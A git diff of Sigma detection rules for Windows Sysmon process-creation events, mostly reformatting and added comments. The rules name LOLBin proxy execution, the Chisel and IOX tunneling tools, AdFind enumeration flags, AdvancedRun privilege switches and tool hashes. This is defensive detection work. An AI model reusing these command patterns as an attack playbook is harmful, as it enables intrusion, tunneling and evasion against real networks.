Image|endswith: \presentationhost.exe + - OriginalFileName: PresentationHost.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// - ftp:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml index f0d199049..d210c26ae 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml @@ -1,11 +1,8 @@ title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE id: d22e2925-cfd8-463f-96f6-89cec9d9bc5f status: test -description: 'Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE - from an uncommon location. These files can be abused to run malicious ".xbap" - files any bypass AWL - - ' +description: | + Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL references: - https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/ author: Nasreddine Bencherchali (Nextron Systems) @@ -24,12 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \presentationhost.exe - - OriginalFileName: PresentationHost.exe + - Image|endswith: \presentationhost.exe + - OriginalFileName: PresentationHost.exe selection_cli: - CommandLine|contains: .xbap + CommandLine|contains: .xbap filter_main_generic: - CommandLine|contains: + CommandLine|contains: # Filter out legitimate locations if you find them - ' C:\Windows\' - ' C:\Program Files' condition: process_creation and (all of selection* and not 1 of filter_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml index 40b79cff5..dc86e296c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml @@ -1,11 +1,10 @@ title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution id: a20391f8-76fb-437b-abc0-dba2df1952c6 related: - - id: 65c3ca2c-525f-4ced-968e-246a713d164f - type: similar + - id: 65c3ca2c-525f-4ced-968e-246a713d164f + type: similar status: test -description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that - can be used to execute any other binary +description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary references: - https://twitter.com/mrd0x/status/1463526834918854661 - https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5 @@ -28,7 +27,6 @@ detection: ParentImage|endswith: \Microsoft.NodejsTools.PressAnyKey.exe condition: process_creation and selection falsepositives: - - Legitimate use by developers as part of NodeJS development with Visual Studio - Tools + - Legitimate use by developers as part of NodeJS development with Visual Studio Tools level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_print_remote_file_copy.yml b/sigma/sysmon/process_creation/proc_creation_win_print_remote_file_copy.yml index ee28cbb23..e3c19ce04 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_print_remote_file_copy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_print_remote_file_copy.yml @@ -21,12 +21,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \print.exe - CommandLine|startswith: print - CommandLine|contains|all: + CommandLine|startswith: print + CommandLine|contains|all: - /D - .exe filter_print: - CommandLine|contains: print.exe + CommandLine|contains: print.exe condition: process_creation and (selection and not filter_print) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_protocolhandler_download.yml b/sigma/sysmon/process_creation/proc_creation_win_protocolhandler_download.yml index 213a5d03c..110d1855c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_protocolhandler_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_protocolhandler_download.yml @@ -1,10 +1,8 @@ title: File Download Using ProtocolHandler.exe id: 104cdb48-a7a8-4ca7-a453-32942c6e5dcb status: test -description: 'Detects usage of "ProtocolHandler" to download files. Downloaded files - will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) - - ' +description: | + Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/ @@ -23,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \protocolhandler.exe - - OriginalFileName: ProtocolHandler.exe + - Image|endswith: \protocolhandler.exe + - OriginalFileName: ProtocolHandler.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_provlaunch_potential_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_provlaunch_potential_abuse.yml index 118b0a5cd..6769f4ebc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_provlaunch_potential_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_provlaunch_potential_abuse.yml @@ -1,15 +1,14 @@ title: Potential Provlaunch.EXE Binary Proxy Execution Abuse id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c related: - - id: f9999590-1f94-4a34-a91e-951e47bedefd - type: similar - - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 - type: similar - - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 - type: similar + - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse + type: similar + - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry + type: similar + - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry + type: similar status: experimental -description: Detects child processes of "provlaunch.exe" which might indicate potential - abuse to proxy execution. +description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -29,25 +28,26 @@ detection: selection: ParentImage|endswith: \provlaunch.exe filter_main_covered_children: - - Image|endswith: - - \calc.exe - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \notepad.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - Image|contains: - - :\PerfLogs\ - - :\Temp\ - - :\Users\Public\ - - \AppData\Temp\ - - \Windows\System32\Tasks\ - - \Windows\Tasks\ - - \Windows\Temp\ + # Note: this filter is here to avoid duplicate alerting by f9999590-1f94-4a34-a91e-951e47bedefd + - Image|endswith: + - \calc.exe + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \notepad.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - Image|contains: + - :\PerfLogs\ + - :\Temp\ + - :\Users\Public\ + - \AppData\Temp\ + - \Windows\System32\Tasks\ + - \Windows\Tasks\ + - \Windows\Temp\ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_provlaunch_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_provlaunch_susp_child_process.yml index 09800e7db..468c6b312 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_provlaunch_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_provlaunch_susp_child_process.yml @@ -1,15 +1,14 @@ title: Suspicious Provlaunch.EXE Child Process id: f9999590-1f94-4a34-a91e-951e47bedefd related: - - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c - type: similar - - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 - type: similar - - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 - type: similar + - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic + type: similar + - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry + type: similar + - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry + type: similar status: experimental -description: Detects suspicious child processes of "provlaunch.exe" which might indicate - potential abuse to proxy execution. +description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -29,25 +28,25 @@ detection: selection_parent: ParentImage|endswith: \provlaunch.exe selection_child: - - Image|endswith: - - \calc.exe - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \notepad.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - Image|contains: - - :\PerfLogs\ - - :\Temp\ - - :\Users\Public\ - - \AppData\Temp\ - - \Windows\System32\Tasks\ - - \Windows\Tasks\ - - \Windows\Temp\ + - Image|endswith: + - \calc.exe + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \notepad.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - Image|contains: + - :\PerfLogs\ + - :\Temp\ + - :\Users\Public\ + - \AppData\Temp\ + - \Windows\System32\Tasks\ + - \Windows\Tasks\ + - \Windows\Temp\ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_psr_capture_screenshots.yml b/sigma/sysmon/process_creation/proc_creation_win_psr_capture_screenshots.yml index 536898fcb..5853da3ce 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_psr_capture_screenshots.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_psr_capture_screenshots.yml @@ -1,8 +1,7 @@ title: Screen Capture Activity Via Psr.EXE id: 2158f96f-43c2-43cb-952a-ab4580f32382 status: test -description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility - used to record the user screen and clicks. +description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. references: - https://lolbas-project.github.io/lolbas/Binaries/Psr/ - https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf @@ -23,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \Psr.exe - CommandLine|contains: + CommandLine|contains: - /start - -start condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_3proxy_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_3proxy_execution.yml index 42cac0364..55b59cb0c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_3proxy_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_3proxy_execution.yml @@ -23,8 +23,8 @@ detection: Image|endswith: \3proxy.exe selection_pe: Description: 3proxy - tiny proxy server - selection_params: - CommandLine|contains: .exe -i127.0.0.1 -p + selection_params: # param combos seen in the wild + CommandLine|contains: .exe -i127.0.0.1 -p condition: process_creation and (1 of selection_*) falsepositives: - Administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_enumeration.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_enumeration.yml index 330e498ce..cd42d3124 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_enumeration.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_enumeration.yml @@ -1,11 +1,10 @@ title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE id: 455b9d50-15a1-4b99-853f-8d37655a4c1b related: - - id: 9a132afa-654e-11eb-ae93-0242ac130002 - type: similar + - id: 9a132afa-654e-11eb-ae93-0242ac130002 + type: similar status: test -description: Detects active directory enumeration activity using known AdFind CLI - flags +description: Detects active directory enumeration activity using known AdFind CLI flags references: - https://www.joeware.net/freetools/tools/adfind/ - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx @@ -24,8 +23,8 @@ detection: process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational - selection_password: - CommandLine|contains: + selection_password: # Listing password policy + CommandLine|contains: - lockoutduration - lockoutthreshold - lockoutobservationwindow @@ -34,10 +33,10 @@ detection: - minpwdlength - pwdhistorylength - pwdproperties - selection_enum_ad: - CommandLine|contains: -sc admincountdmp - selection_enum_exchange: - CommandLine|contains: -sc exchaddresses + selection_enum_ad: # Enumerate Active Directory Admins + CommandLine|contains: -sc admincountdmp + selection_enum_exchange: # Enumerate Active Directory Exchange AD Objects + CommandLine|contains: -sc exchaddresses condition: process_creation and (1 of selection_*) falsepositives: - Authorized administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_susp_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_susp_usage.yml index d88551471..b2bc8e521 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_susp_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_susp_usage.yml @@ -1,10 +1,10 @@ title: PUA - AdFind Suspicious Execution id: 9a132afa-654e-11eb-ae93-0242ac130002 related: - - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b - type: similar - - id: 75df3b17-8bcc-4565-b89b-c9898acef911 - type: obsoletes + - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b + type: similar + - id: 75df3b17-8bcc-4565-b89b-c9898acef911 + type: obsoletes status: test description: Detects AdFind execution with common flags seen used during attacks references: @@ -15,8 +15,7 @@ references: - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx - https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects -author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, - oscd.community +author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community date: 2021/02/02 modified: 2023/03/05 tags: @@ -35,7 +34,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - domainlist - trustdmp - dcmodes diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml index 1df575759..58a2741e6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml @@ -1,8 +1,7 @@ title: PUA - Advanced IP Scanner Execution id: bef37fa2-f205-4a7b-b484-0759bfd5f86f status: test -description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for - ransomware groups. +description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. references: - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html @@ -26,11 +25,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|contains: \advanced_ip_scanner - - OriginalFileName|contains: advanced_ip_scanner - - Description|contains: Advanced IP Scanner + - Image|contains: \advanced_ip_scanner # Covers also advanced_ip_scanner_console.exe + - OriginalFileName|contains: advanced_ip_scanner # Covers also advanced_ip_scanner_console.exe + - Description|contains: Advanced IP Scanner selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /portable - /lng condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_port_scanner.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_port_scanner.yml index 1282f60e6..eaa8102f4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_port_scanner.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_port_scanner.yml @@ -20,11 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|contains: \advanced_port_scanner - - OriginalFileName|contains: advanced_port_scanner - - Description|contains: Advanced Port Scanner + - Image|contains: \advanced_port_scanner + - OriginalFileName|contains: advanced_port_scanner # Covers also advanced_port_scanner_console.exe + - Description|contains: Advanced Port Scanner selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /portable - /lng condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun.yml index bd9b76d7b..ed66bc9ab 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun.yml @@ -1,8 +1,8 @@ title: PUA - AdvancedRun Execution id: d2b749ee-4225-417e-b20e-a8d2193cbb84 related: - - id: fa00b701-44c6-4679-994d-5a18afa8a707 - type: similar + - id: fa00b701-44c6-4679-994d-5a18afa8a707 + type: similar status: test description: Detects the execution of AdvancedRun utility references: @@ -29,14 +29,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: AdvancedRun.exe - - CommandLine|contains|all: - - ' /EXEFilename ' - - ' /Run' - - CommandLine|contains|all: - - ' /WindowState 0' - - ' /RunAs ' - - ' /CommandLine ' + - OriginalFileName: AdvancedRun.exe + - CommandLine|contains|all: + - ' /EXEFilename ' + - ' /Run' + - CommandLine|contains|all: + - ' /WindowState 0' + - ' /RunAs ' + - ' /CommandLine ' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml index 1ead55907..031b3cbe4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml @@ -1,11 +1,10 @@ title: PUA - AdvancedRun Suspicious Execution id: fa00b701-44c6-4679-994d-5a18afa8a707 related: - - id: d2b749ee-4225-417e-b20e-a8d2193cbb84 - type: similar + - id: d2b749ee-4225-417e-b20e-a8d2193cbb84 + type: similar status: test -description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, - SYSTEM, Local Service or Network Service accounts +description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts references: - https://twitter.com/splinter_code/status/1483815103279603714 - https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3 @@ -27,20 +26,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - /EXEFilename - /CommandLine selection_runas: - - CommandLine|contains: - - ' /RunAs 8 ' - - ' /RunAs 4 ' - - ' /RunAs 10 ' - - ' /RunAs 11 ' - - CommandLine|endswith: - - /RunAs 8 - - /RunAs 4 - - /RunAs 10 - - /RunAs 11 + - CommandLine|contains: + - ' /RunAs 8 ' + - ' /RunAs 4 ' + - ' /RunAs 10 ' + - ' /RunAs 11 ' + - CommandLine|endswith: + - /RunAs 8 + - /RunAs 4 + - /RunAs 10 + - /RunAs 11 condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_chisel.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_chisel.yml index 0c224fab7..5523b3397 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_chisel.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_chisel.yml @@ -1,8 +1,8 @@ title: PUA - Chisel Tunneling Tool Execution id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 related: - - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf - type: similar + - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf + type: similar status: test description: Detects usage of the Chisel tunneling tool via the commandline arguments references: @@ -26,11 +26,11 @@ detection: selection_img: Image|endswith: \chisel.exe selection_param1: - CommandLine|contains: + CommandLine|contains: - 'exe client ' - 'exe server ' selection_param2: - CommandLine|contains: + CommandLine|contains: - -socks5 - -reverse - ' r:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_cleanwipe.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_cleanwipe.yml index cbc54f801..af26fcdb3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_cleanwipe.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_cleanwipe.yml @@ -22,13 +22,13 @@ detection: Image|endswith: \SepRemovalToolNative_x64.exe selection2: Image|endswith: \CATClean.exe - CommandLine|contains: --uninstall + CommandLine|contains: --uninstall selection3: Image|endswith: \NetInstaller.exe - CommandLine|contains: -r + CommandLine|contains: -r selection4: Image|endswith: \WFPUnins.exe - CommandLine|contains|all: + CommandLine|contains|all: - /uninstall - /enterprise condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_crassus.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_crassus.yml index c5ff57eb2..44cf6378f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_crassus.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_crassus.yml @@ -1,8 +1,7 @@ title: PUA - Crassus Execution id: 2c32b543-1058-4808-91c6-5b31b8bed6c5 status: experimental -description: Detects Crassus, a Windows privilege escalation discovery tool, based - on PE metadata characteristics. +description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics. references: - https://github.com/vu-ls/Crassus author: pH-T (Nextron Systems) @@ -19,9 +18,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \Crassus.exe - - OriginalFileName: Crassus.exe - - Description|contains: Crassus + - Image|endswith: \Crassus.exe + - OriginalFileName: Crassus.exe + - Description|contains: Crassus condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_csexec.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_csexec.yml index c783b6b46..ad6b619a5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_csexec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_csexec.yml @@ -1,8 +1,7 @@ title: PUA - CsExec Execution id: d08a2711-ee8b-4323-bdec-b7d85e892b31 status: test -description: Detects the use of the lesser known remote execution tool named CsExec - a PsExec alternative +description: Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative references: - https://github.com/malcomvetter/CSExec - https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_defendercheck.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_defendercheck.yml index 8aeb49be9..e89ca3b3d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_defendercheck.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_defendercheck.yml @@ -1,9 +1,7 @@ title: PUA - DefenderCheck Execution id: f0ca6c24-3225-47d5-b1f5-352bf07ecfa7 status: test -description: Detects the use of DefenderCheck, a tool to evaluate the signatures used - in Microsoft Defender. It can be used to figure out the strings / byte chains - used in Microsoft Defender to detect a tool and thus used for AV evasion. +description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. references: - https://github.com/matterpreter/DefenderCheck author: Florian Roth (Nextron Systems) @@ -21,8 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \DefenderCheck.exe - - Description: DefenderCheck + - Image|endswith: \DefenderCheck.exe + - Description: DefenderCheck condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_ditsnap.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_ditsnap.yml index 763c0e385..742ce7ef4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_ditsnap.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_ditsnap.yml @@ -1,8 +1,7 @@ title: PUA - DIT Snapshot Viewer id: d3b70aad-097e-409c-9df2-450f80dc476b status: test -description: Detects the use of Ditsnap tool, an inspection tool for Active Directory - database, ntds.dit. +description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit. references: - https://thedfirreport.com/2020/06/21/snatch-ransomware/ - https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap @@ -21,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \ditsnap.exe - - CommandLine|contains: ditsnap.exe + - Image|endswith: \ditsnap.exe + - CommandLine|contains: ditsnap.exe condition: process_creation and selection falsepositives: - Legitimate admin usage diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_frp.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_frp.yml index ef3a33794..d2890df92 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_frp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_frp.yml @@ -1,8 +1,7 @@ title: PUA - Fast Reverse Proxy (FRP) Execution id: 32410e29-5f94-4568-b6a3-d91a8adad863 status: test -description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to - help you expose a local server behind a NAT or firewall to the Internet. +description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet. references: - https://asec.ahnlab.com/en/38156/ - https://github.com/fatedier/frp @@ -25,15 +24,16 @@ detection: - \frpc.exe - \frps.exe selection_cli: - CommandLine|contains: \frpc.ini + CommandLine|contains: \frpc.ini selection_hashes: - - Hashes|contains: - - MD5=7D9C233B8C9E3F0EA290D2B84593C842 - - SHA1=06DDC9280E1F1810677935A2477012960905942F - - SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C - - md5: 7d9c233b8c9e3f0ea290d2b84593c842 - - sha1: 06ddc9280e1f1810677935a2477012960905942f - - sha256: 57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c + # v0.44.0 + - Hashes|contains: + - MD5=7D9C233B8C9E3F0EA290D2B84593C842 + - SHA1=06DDC9280E1F1810677935A2477012960905942F + - SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C + - md5: 7d9c233b8c9e3f0ea290d2b84593c842 + - sha1: 06ddc9280e1f1810677935a2477012960905942f + - sha256: 57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c condition: process_creation and (1 of selection_*) falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_iox.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_iox.yml index 097538ec9..3a6042bf1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_iox.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_iox.yml @@ -1,8 +1,7 @@ title: PUA- IOX Tunneling Tool Execution id: d7654f02-e04b-4934-9838-65c46f187ebc status: test -description: Detects the use of IOX - a tool for port forwarding and intranet proxy - purposes +description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes references: - https://github.com/EddieIvan01/iox author: Florian Roth (Nextron Systems) @@ -22,19 +21,20 @@ detection: selection: Image|endswith: \iox.exe selection_commandline: - CommandLine|contains: + CommandLine|contains: - '.exe fwd -l ' - '.exe fwd -r ' - '.exe proxy -l ' - '.exe proxy -r ' selection_hashes: - - Hashes|contains: - - MD5=9DB2D314DD3F704A02051EF5EA210993 - - SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD - - SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731 - - md5: 9db2d314dd3f704a02051ef5ea210993 - - sha1: 039130337e28a6623ecf9a0a3da7d92c5964d8dd - - sha256: c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731 + # v0.4 + - Hashes|contains: + - MD5=9DB2D314DD3F704A02051EF5EA210993 + - SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD + - SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731 + - md5: 9db2d314dd3f704a02051ef5ea210993 + - sha1: 039130337e28a6623ecf9a0a3da7d92c5964d8dd + - sha256: c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731 condition: process_creation and (1 of selection*) falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_mouselock_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_mouselock_execution.yml index 6c23f8d2a..41d8104bf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_mouselock_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_mouselock_execution.yml @@ -1,9 +1,7 @@ title: PUA - Mouse Lock Execution id: c9192ad9-75e5-43eb-8647-82a0a5b493e3 status: test -description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate - tool "Mouse Lock" as being used for both credential access and collection in security - incidents. +description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents. references: - 